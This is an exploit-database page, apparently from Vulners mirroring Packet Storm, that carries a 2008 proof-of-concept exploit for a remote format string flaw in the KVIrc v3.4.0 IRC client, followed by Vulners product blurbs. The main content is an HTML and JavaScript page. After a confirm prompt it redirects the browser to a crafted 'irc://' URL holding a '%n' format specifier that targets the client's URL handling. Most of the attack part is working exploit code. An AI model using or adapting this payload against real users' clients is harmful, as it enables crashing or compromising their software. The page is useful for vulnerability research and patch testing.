Lucene search
K

kvirc-format.txt

🗓️ 24 Oct 2008 00:00:00Reported by LiquidWormType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 30 Views

KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC) on http://www.kvirc.net/

Code
`<!--  
  
KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)  
  
Summary: KVIrc is a free portable IRC client based on the excellent Qt GUI toolkit.  
KVirc is being written by Szymon Stefanek and the KVIrc Development Team with  
the contribution of many IRC addicted developers around the world.  
  
Product web page: http://www.kvirc.net/  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
  
liquidworm [t00t] gmail [d0t] com  
  
http://www.zeroscience.org  
  
24.10.2008  
  
-->  
  
  
<html>  
  
<title>KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)</Title>  
  
<head>  
  
<body>  
  
<center> <br /> <br /> <strong>Warning ! :)</strong> </center>  
  
<body bgcolor="#FFFF00">  
  
<script type="text/javascript">  
  
alert("KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)\n\n\t\tby LiquidWorm (c) 2008");  
  
function poc()  
{  
window.location.href = "irc://A:%n -i";  
}  
  
var answ = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");  
  
if (answ == true)   
{  
poc();  
}  
  
else  
{  
window.location.href = "http://www.kvirc.net";  
}  
  
</script> </body> </head> </html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation